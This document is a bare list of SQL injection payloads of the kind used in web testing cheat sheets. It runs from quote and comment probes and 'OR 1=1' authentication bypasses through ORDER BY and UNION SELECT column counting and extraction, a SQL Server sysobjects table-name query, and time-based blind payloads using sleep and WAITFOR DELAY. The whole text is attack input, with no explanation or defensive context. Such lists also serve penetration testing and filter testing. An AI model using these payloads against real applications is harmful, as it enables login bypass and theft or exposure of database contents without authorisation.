'
''
`
``
,
"
""
/
//
\
;
' or "
-- or #
' OR '1
' OR 1 -- -
" OR "" = "
" OR 1 = 1 -- -ZAP' OR '1'='1'--
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x ' AND id IS NULL; -- '''''''''''''UNION SELECT '2 %00 /*…*/
+                   addition, concatenate (or space in url)
|| (double pipe)    concatenate
%                   wildcard attribute indicator
@variable           local variable
@@variable          global variable
AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2
1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+
1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
Finding the table name (label for the sysobjects query on the previous line; sysobjects is a SQL Server catalog view)
Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'--
Comments:
/*      C-style comment
-- -    SQL comment
;%00    Nullbyte
`       Backtick